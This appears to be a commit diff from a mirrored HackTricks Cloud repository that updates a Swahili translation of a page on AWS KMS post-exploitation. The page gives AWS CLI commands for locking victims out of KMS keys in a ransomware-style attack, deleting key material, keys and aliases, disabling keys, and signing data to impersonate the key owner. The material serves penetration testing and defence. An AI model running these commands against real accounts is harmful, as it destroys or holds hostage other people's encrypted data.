gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-06-12 19:11:44 -07:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-cloud/aws-security/aws-post-exploitation

Browse Source
This commit is contained in:
Translator
2026-02-23 11:13:58 +00:00
parent 433e713ffb
commit 82a976ef1e
1 changed files with 30 additions and 28 deletions
Download Patch File Download Diff File Expand all files Collapse all files
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation/README.md
+30 -28
View File
@@ -12,13 +12,13 @@ Kwa maelezo zaidi angalia:
### Encrypt/Decrypt information
`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files:
`fileb://` na `file://` ni URI schemes zinazotumika katika amri za AWS CLI kubainisha njia za faili za ndani:
- `fileb://:` Husoma faili kwa mode ya binary, hutumika kwa kawaida kwa faili zisizo za maandishi.
- `file://:` Husoma faili kwa mode ya maandishi, kawaida hutumika kwa faili za maandishi ya kawaida, scripts, au JSON ambazo hazina mahitaji maalum ya encoding.
- `fileb://:` Husoma faili katika mode ya binary, mara nyingi kutumika kwa faili zisizo za maandishi.
- `file://:` Husoma faili katika mode ya maandishi, kawaida kutumika kwa faili za maandishi rahisi, scripts, au JSON ambazo hazina mahitaji maalum ya encoding.
> [!TIP]
> Kumbuka kwamba ikiwa unataka ku-decrypt data ndani ya faili, faili lazima iweke data ya binary, sio data iliyokuwa encoded kwa base64. (fileb://)
> Kumbuka kuwa ikiwa unataka decrypt data ndani ya faili, faili lazima iwe na data ya binary, si base64 encoded data. (fileb://)
- Using a **symmetric** key
```bash
@@ -38,7 +38,7 @@ aws kms decrypt \
--query Plaintext | base64 \
--decode
```
- Kutumia ufunguo wa **asimetri**:
- Kutumia ufunguo **asymmetric**:
```bash
# Encrypt data
aws kms encrypt \
@@ -60,14 +60,14 @@ aws kms decrypt \
```
### KMS Ransomware
Mshambulizi mwenye privileged access juu ya KMS anaweza kubadilisha sera za KMS za keys na kumweka akaunti yake kupata ufikiaji wa keys hizo, na kuondoa ufikiaji uliotolewa kwa akaunti halali.
Mshambuliaji aliye na ufikiaji wa kipekee kwa KMS anaweza kubadilisha sera ya KMS ya funguo na **kumpa akaunti yake ufikiaji juu yao**, kuondoa ufikiaji uliotolewa kwa akaunti halali.
Hivyo, watumiaji wa akaunti halali hawawezi kupata taarifa za huduma yoyote iliyokuwa imeencrypted kwa keys hizo, na hivyo kuunda ransomware rahisi lakini yenye ufanisi dhidi ya akaunti.
Kisha, watumiaji wa akaunti halali hawawezi kupata taarifa yoyote ya huduma yoyote iliyosimbwa na funguo hizo, na hivyo kuunda ransomware rahisi lakini yenye ufanisi dhidi ya akaunti.
> [!WARNING]
> Kumbuka kwamba **AWS managed keys aren't affected** na shambulio hili; ni **Customer managed keys** pekee.
> Kumbuka kwamba **AWS managed keys aren't affected** na shambulio hili; ni **Customer managed keys** tu.
> Pia kumbuka hitaji la kutumia param **`--bypass-policy-lockout-safety-check`** (kukosekana kwa chaguo hili kwenye web console kunafanya shambulio hili liwe linawezekana tu kutoka kwenye CLI).
> Pia kumbuka hitaji la kutumia param **`--bypass-policy-lockout-safety-check`** (ukosefu wa chaguo hili kwenye web console hufanya shambulio hili liwe linawezekana tu kutoka CLI).
```bash
# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
@@ -92,28 +92,28 @@ aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
}
```
> [!CAUTION]
> Kumbuka kwamba ikiwa utabadilisha sera hiyo na kutoa ufikiaji tu kwa account ya nje, na kuka toka kwa account hiyo ya nje ukajaribu kuweka sera mpya ili **give the access back to original account, you won't be able cause the Put Polocy action cannot be performed from a cross account**.
> Kumbuka kwamba ikiwa utabadilisha sera hiyo na kutoa ufikiaji kwa external account pekee, na kisha kutoka kwenye external account hii ukajaribu kuweka sera mpya ili **kurudisha ufikiaji kwa original account, hautaweza kwa sababu Put Polocy action cannot be performed from a cross account**.
<figure><img src="../../../images/image (77).png" alt=""><figcaption></figcaption></figure>
### Generic KMS Ransomware
Kuna njia nyingine ya kutekeleza global KMS Ransomware, ambayo ingejumuisha hatua zifuatazo:
There is another way to perform a global KMS Ransomware, which would involve the following steps:
- Unda **ufunguo mpya wenye key material** uliyoingizwa na mshambuliaji
- **Re-encrypt data za zamani** za mwathiriwa zilizokuwa zimefungwa kwa toleo la awali kwa kutumia ufunguo mpya
- Tengeneza mpya **key with a key material** iliyopakiwa na attacker
- **Re-encrypt older data** ya victim iliyokuwa encrypted na previous version kwa kutumia ile mpya
- **Delete the KMS key**
- Sasa mshambuliaji pekee, ambaye ana material ya ufunguo ya awali, atakuwa na uwezo wa kufungua data zilizofichwa
- Sasa ni attacker pekee, ambaye ana original key material, angeweza decrypt the encrypted data
### Delete Keys via kms:DeleteImportedKeyMaterial
Kwa ruhusa ya `kms:DeleteImportedKeyMaterial`, mhusika anaweza kufuta imported key material kutoka kwa CMKs zenye `Origin=EXTERNAL` (CMKs ambazo zimetumia imported key material), na kuwafanya wasiweze kufungua data. Kitendo hiki ni cha uharibifu na hakiwezi kurekebishwa isipokuwa material inayolingana iingizwe tena, na kumruhusu mshambuliaji kusababisha kwa ufanisi upotevu wa data unaofanana na ransomware kwa kufanya taarifa zilizofichwa zisipatikane kabisa.
With the `kms:DeleteImportedKeyMaterial` permission, an actor can delete the imported key material from CMKs with `Origin=EXTERNAL` (CMKs that have imported their key material), making them unable to decrypt data. This action is destructive and irreversible unless compatible material is re-imported, allowing an attacker to effectively cause ransomware-like data loss by rendering encrypted information permanently inaccessible.
```bash
aws kms delete-imported-key-material --key-id <Key_ID>
```
### Haribu funguo
### Kuangamiza keys
Kwa kuharibu funguo, inawezekana kutekeleza DoS.
Kuangamiza keys kunaweza kusababisha DoS.
```bash
# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
@@ -121,10 +121,10 @@ aws kms schedule-key-deletion \
--pending-window-in-days 7
```
> [!CAUTION]
> Kumbuka kuwa AWS sasa **inazuia vitendo vya awali kufanywa kutoka cross account:**
> Kumbuka kwamba AWS sasa **inazuia vitendo vya awali kutekelezwa kutoka kwa akaunti nyingine:**
### Badilisha au futa Alias
Shambulio hili huondoa au kuelekeza upya AWS KMS aliases, ukivuruga key resolution na kusababisha kushindwa mara moja kwa huduma yoyote inayotegemea aliases hizo, na hivyo kusababisha denial-of-service. Kwa ruhusa kama `kms:DeleteAlias` au `kms:UpdateAlias` mshambuliaji anaweza kuondoa au kuelekeza tena aliases na kuharibu cryptographic operations (e.g., encrypt, describe). Huduma yoyote inayorejelea alias badala ya key ID inaweza kushindwa hadi alias itakaporudishwa au kupangwa upya kwa usahihi.
### Change or delete Alias
Shambulio hili huondoa au kuielekeza upya aliases za AWS KMS, kuvunja utambuzi wa funguo na kusababisha kushindwa mara moja kwa huduma zozote zinazotegemea aliases hizo, na kusababisha denial-of-service. Kwa ruhusa kama `kms:DeleteAlias` au `kms:UpdateAlias` mshambuliaji anaweza kuondoa au kuielekeza upya alias na kuharibu cryptographic operations (mf., encrypt, describe). Huduma yoyote inayorejea alias badala ya key ID inaweza kushindwa hadi alias itakaporejeshwa au kurekebishwa kwa usahihi.
```bash
# Delete Alias
aws kms delete-alias --alias-name alias/<key_alias>
@@ -134,8 +134,8 @@ aws kms update-alias \
--alias-name alias/<key_alias> \
--target-key-id <new_target_key>
```
### Kusitisha Ufutaji wa Funguo
Kwa ruhusa kama `kms:CancelKeyDeletion` na `kms:EnableKey`, mhusika anaweza kusitisha ufutaji uliopangwa wa AWS KMS customer master key na baadaye kuiwezesha tena. Kufanya hivyo kunarudisha funguo (mwanzoni katika Disabled state) na kurejesha uwezo wake wa ku-decrypt data iliyokuwa imehifadhiwa awali, na hivyo kuruhusu exfiltration.
### Cancel Key Deletion
Kwa ruhusa kama `kms:CancelKeyDeletion` na `kms:EnableKey`, mhusika anaweza kuhairisha ufutaji uliopangwa wa AWS KMS customer master key na baadaye kuuiwasha tena. Hilo huirudisha ufunguo (awali katika Disabled state) na kurejesha uwezo wake wa decrypt data iliyokuwa imehifadhiwa awali, hivyo kuwezesha exfiltration.
```bash
# Firts cancel de deletion
aws kms cancel-key-deletion \
@@ -145,14 +145,16 @@ aws kms cancel-key-deletion \
aws kms enable-key \
--key-id <Key_ID>
```
### Disable Key
Kwa ruhusa ya `kms:DisableKey`, mshambuliaji anaweza kuzima AWS KMS customer master key, kuizuia kutumika kwa encryption au decryption. Hii inavunja ufikiaji kwa huduma zozote zinazotegemea CMK hiyo na inaweza kusababisha usumbufu wa mara moja au denial-of-service hadi key iruhusiwe tena.
### Kuzima Key
Kwa ruhusa ya `kms:DisableKey`, mtendaji anaweza kuzima AWS KMS customer master key (CMK), kuizuia kutumika kwa encryption au decryption.
Hii inavunja ufikiaji kwa huduma yoyote inayomtegemea CMK hiyo na inaweza kusababisha usumbufu wa papo hapo au denial-of-service hadi key itakapowezeshwa tena.
```bash
aws kms disable-key \
--key-id <key_id>
```
### Kupata Siri Iliyoshirikiwa
Kwa ruhusa ya `kms:DeriveSharedSecret`, mhusika anaweza kutumia funguo binafsi iliyohifadhiwa kwenye KMS pamoja na funguo ya umma iliyotolewa na mtumiaji ili kuhesabu siri ya ECDH iliyoshirikiwa.
### Pata Siri ya Pamoja
Kwa ruhusa ya `kms:DeriveSharedSecret`, mhusika anaweza kutumia funguo binafsi inayoshikiliwa na KMS pamoja na funguo ya umma iliyotolewa na mtumiaji kukokotoa siri ya pamoja ya ECDH.
```bash
aws kms derive-shared-secret \
--key-id <key_id> \
@@ -160,7 +162,7 @@ aws kms derive-shared-secret \
--key-agreement-algorithm <algorithm>
```
### Impersonation via kms:Sign
Kwa ruhusa ya `kms:Sign`, mhusika anaweza kutumia CMK iliyohifadhiwa kwenye KMS kusaini data kwa njia ya kriptografia bila kufichua private key, akitengeneza signatures halali zinazoweza kuwezesha impersonation au kuidhinisha vitendo vibaya.
Kwa ruhusa ya `kms:Sign`, mhusika anaweza kutumia CMK iliyohifadhiwa kwenye KMS kusaini data kwa njia ya cryptography bila kufichua private key, akitengeneza saini halali ambazo zinaweza kuwezesha impersonation au kuruhusu vitendo vibaya.
```bash
aws kms sign \
--key-id <key-id> \
@@ -169,7 +171,7 @@ aws kms sign \
--message-type RAW
```
### DoS with Custom Key Stores
Kwa ruhusa kama `kms:DeleteCustomKeyStore`, `kms:DisconnectCustomKeyStore`, au `kms:UpdateCustomKeyStore`, mhusika anaweza kubadilisha, kutenganisha, au kufuta AWS KMS Custom Key Store (CKS), na kufanya master keys zake zisifanye kazi. Hiyo inavunja encryption, decryption, na signing operations kwa huduma yoyote inayotegemea funguo hizo na inaweza kusababisha mara moja denial-of-service. Kwa hivyo, ni muhimu kuzuia na kufuatilia ruhusa hizo.
Kwa ruhusa kama `kms:DeleteCustomKeyStore`, `kms:DisconnectCustomKeyStore`, au `kms:UpdateCustomKeyStore`, mtumiaji anaweza kubadilisha, kutenganisha, au kufuta AWS KMS Custom Key Store (CKS), na kufanya vifunguo vyake vya msingi visifanye kazi. Hii itavunja shughuli za encryption, decryption, na signing kwa huduma zote zinazotegemea vifunguo hivyo na inaweza kusababisha denial-of-service mara moja. Kudhibiti na kufuatilia ruhusa hizo ni muhimu.
```bash
aws kms delete-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID>